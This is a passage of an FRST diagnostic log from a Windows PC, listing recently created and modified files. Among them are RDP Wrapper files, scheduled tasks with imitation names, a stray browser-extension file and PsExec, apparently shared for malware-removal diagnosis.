2026-08-04 18:45 - 000000000 ___HD C:\OneDriveTemp 2026-08-04 16:40 - 2026-08-04 18:09 - 000004086 _____ C:\WINDOWS\system32\Tasks\Apple Sync 2026-08-02 20:17 - 2026-08-02 23:30 - 000000000 ___HD C:\$WINDOWS.~BT 2026-08-02 20:06 - 2026-08-02 20:10 - 000000000 ___HD C:\$GetCurrent 2026-08-02 20:06 - 2026-08-02 20:10 - 000000000 ____D C:\Program Files (x86)\WindowsInstallationAssistant 2026-08-02 20:02 - 2026-08-02 20:02 - 000000000 ___HD C:\$Windows.~WS 2026-08-02 18:05 - 2026-08-02 18:05 - 000000000 ____D C:\Users\PG\AppData\Roaming\Microsoft\HTML Help 2026-08-02 15:00 - 2026-08-02 15:00 - 000000000 ____D C:\Program Files\OpenSSH 2026-08-02 12:50 - 2026-08-02 20:05 - 000000000 ____D C:\ESD 2026-08-02 12:27 - 2026-08-02 12:27 - 000000000 ____D C:\Users\PG\AppData\Local\Backup 2026-08-02 09:43 - 2026-08-02 10:10 - 000007613 _____ C:\Users\PG\AppData\Local\Resmon.ResmonCfg 2026-08-02 07:33 - 2026-08-02 22:43 - 000003760 _____ C:\WINDOWS\diagerr.xml 2026-08-02 07:33 - 2026-08-02 22:43 - 000001908 _____ C:\WINDOWS\diagwrn.xml 2026-08-02 07:30 - 2026-08-02 20:16 - 000000036 _____ C:\WINDOWS\progress.ini 2026-08-01 19:19 - 2026-08-01 19:51 - 000000000 ___HD C:\$SysReset 2026-08-01 18:54 - 2026-08-04 17:47 - 000001337 _____ C:\Users\PG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk 2026-08-01 18:54 - 2026-08-04 17:47 - 000000000 ___RD C:\Users\PG\AppData\Local\PCHealthCheck 2026-08-01 18:54 - 2026-08-01 18:54 - 000001939 _____ C:\Users\PG\Desktop\PC Health Check.lnk 2026-08-01 17:27 - 2026-08-01 17:27 - 000116736 _____ (Stas'M Corp.) C:\WINDOWS\system32\rdpwrap.dll 2026-07-30 08:12 - 2026-07-30 08:12 - 000002163 _____ C:\Users\PG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive Photos.lnk 2026-07-08 14:19 - 2026-07-08 14:19 - 000060072 _____ (HP) C:\WINDOWS\system32\Drivers\Accelerometer.sys 2026-07-06 19:16 - 2026-07-30 14:03 - 000004060 _____ C:\WINDOWS\system32\Tasks\GoogleUpdaterTask 2026-07-06 12:21 - 2026-07-06 12:21 - 000156044 _____ C:\Users\PG\Desktop\TERMINATION.pdf 2026-07-06 12:13 - 2026-07-06 12:13 - 002072011 _____ C:\Users\PG\Desktop\SSA44.pdf ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2026-08-05 03:09 - 2018-04-28 01:06 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2026-08-05 01:28 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\AppReadiness 2026-08-05 01:23 - 2023-12-18 20:53 - 000000000 ____D C:\WINDOWS\CbsTemp 2026-08-05 01:11 - 2024-04-13 05:56 - 000000000 ____D C:\WINDOWS\Minidump 2026-08-05 01:11 - 2021-08-07 04:57 - 000000000 ____D C:\Users\PG\Downloads\Telegram Desktop 2026-08-04 22:56 - 2023-12-18 21:00 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2026-08-04 22:56 - 2023-12-18 20:58 - 000000000 ____D C:\WINDOWS\INF 2026-08-04 22:18 - 2023-12-18 21:25 - 000006740 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2026-08-04 22:17 - 2023-12-18 21:50 - 000000000 ____D C:\Users\PG\AppData\Local\D3DSCache 2026-08-04 22:15 - 2023-12-18 21:00 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2026-08-04 22:14 - 2023-12-18 21:27 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2026-08-04 22:14 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\ServiceState 2026-08-04 22:14 - 2023-12-18 19:33 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2026-08-04 22:14 - 2020-12-14 16:58 - 000008192 ___SH C:\DumpStack.log.tmp 2026-08-04 22:14 - 2018-12-15 16:49 - 000000000 __SHD C:\Users\PG\IntelGraphicsProfiles 2026-08-04 22:13 - 2023-12-18 20:30 - 000000000 ____D C:\Users\PG 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\system32\lv-LV 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\system32\lt-LT 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\system32\et-EE 2026-08-04 22:12 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\system32\es-MX 2026-08-04 21:33 - 2024-02-11 20:20 - 000000000 ____D C:\Users\PG\AppData\Local\CrashDumps 2026-08-04 21:29 - 2023-12-18 21:04 - 000000000 ____D C:\ProgramData\ssh 2026-08-04 21:28 - 2023-12-18 20:45 - 000786432 _____ C:\WINDOWS\system32\config\BBI 2026-08-04 20:43 - 2026-06-30 22:41 - 000000000 ___HD C:\Users\PG\.ssh 2026-08-04 20:27 - 2018-12-15 16:51 - 000000000 ___RD C:\Users\PG\OneDrive 2026-08-04 19:53 - 2024-02-05 03:22 - 000000000 ____D C:\Users\PG\AppData\Local\ElevatedDiagnostics 2026-08-04 18:15 - 2026-06-30 23:03 - 000004352 _____ C:\WINDOWS\system32\Tasks\GDrive Backup Sync 2026-08-04 18:12 - 2026-06-30 23:27 - 000134015 _____ C:\Users\PG\AppData\Roaming\gjmignimbakkmjdmjpgghpmikmlpfjgi.crx 2026-08-04 16:55 - 2026-06-30 22:44 - 000004208 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting 2026-08-04 16:39 - 2026-06-30 23:21 - 000555632 _____ C:\WINDOWS\system32\rdpwrap.ini 2026-08-04 06:50 - 2023-12-18 21:00 - 000000000 ___HD C:\Program Files\WindowsApps 2026-08-04 06:40 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\SystemTemp 2026-08-03 01:14 - 2023-12-18 21:23 - 000000000 ____D C:\WINDOWS\softwaredistribution.bak 2026-08-03 01:13 - 2018-05-28 10:24 - 000000000 ____D C:\Program Files\HP 2026-08-03 00:16 - 2018-05-28 11:01 - 000000000 ____D C:\SWSetup 2026-08-02 21:23 - 2023-12-18 21:00 - 000000000 ____D C:\WINDOWS\Registration 2026-08-02 20:25 - 2023-12-18 21:24 - 000000000 ____D C:\WINDOWS\Panther 2026-08-02 19:54 - 2023-12-19 18:58 - 000000000 ____D C:\Users\PG\AppData\Roaming\Microsoft\MMC 2026-08-02 12:26 - 2023-12-18 21:47 - 000000000 ____D C:\Users\PG\AppData\Local\ConnectedDevicesPlatform 2026-08-02 09:24 - 2025-02-05 19:11 - 000003148 _____ C:\WINDOWS\system32\Tasks\OneDrive Startup Task-S-1-5-21-3754613442-372446698-354282701-1001 2026-08-02 09:24 - 2023-12-18 21:53 - 000003118 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-3754613442-372446698-354282701-1001 2026-08-02 09:24 - 2023-12-18 21:53 - 000002914 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3754613442-372446698-354282701-1001 2026-08-02 09:24 - 2023-12-18 21:27 - 000002830 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task v2 2026-08-02 07:11 - 2020-07-19 19:01 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2026-08-02 07:03 - 2023-12-18 21:38 - 000003612 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA{C461E853-6D94-491B-A5C2-C44F9588EC3D} 2026-08-02 07:03 - 2023-12-18 21:38 - 000003486 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore{4645F3AB-98F1-4ACF-832B-EE7A6DFDEC05} 2026-08-01 17:33 - 2026-06-30 22:33 - 000000004 _____ C:\ProgramData\oko_ver 2026-08-01 17:33 - 2026-06-30 22:33 - 000000000 _____ C:\ProgramData\oko 2026-08-01 05:15 - 2023-12-18 21:47 - 000000000 ____D C:\Users\PG\AppData\Local\Packages 2026-07-30 08:12 - 2025-06-30 19:42 - 000002377 _____ C:\Users\PG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2026-07-21 23:50 - 2023-12-18 19:47 - 000000000 ____D C:\ProgramData\Realtek 2026-07-15 02:04 - 2023-12-19 20:51 - 228534800 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2026-07-15 02:04 - 2023-12-19 20:51 - 000000000 ____D C:\WINDOWS\system32\MRT 2026-07-13 20:10 - 2024-04-28 11:07 - 000000000 ____D C:\Users\PG\AppData\Local\PlaceholderTileLogoFolder 2026-07-13 20:10 - 2018-12-15 16:05 - 000000000 ____D C:\ProgramData\Packages 2026-07-08 14:19 - 2022-06-14 15:09 - 000069800 _____ (HP) C:\WINDOWS\system32\Drivers\hpdskflt.sys 2026-07-07 22:24 - 2025-03-11 19:55 - 000000352 _____ C:\WINDOWS\Tasks\HPCeeScheduleForPG.job 2026-07-07 21:25 - 2025-07-08 20:20 - 000003232 _____ C:\WINDOWS\system32\Tasks\HPCeeScheduleForPG ==================== Files in the root of some directories ======== 2026-06-30 21:30 - 2026-06-30 21:30 - 000000032 _____ () C:\ProgramData\hwid.dat 2026-07-02 15:03 - 2026-07-02 15:03 - 000833472 _____ (Sysinternals - www.sysinternals.com) C:\Users\PG\PsExec.exe 2026-06-30 23:27 - 2026-08-04 18:12 - 000134015 _____ () C:\Users\PG\AppData\Roaming\gjmignimbakkmjdmjpgghpmikmlpfjgi.crx 2026-08-02 09:43 - 2026-08-02 10:10 - 000007613 _____ () C:\Users\PG\AppData\Local\Resmon.ResmonCfg ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ========================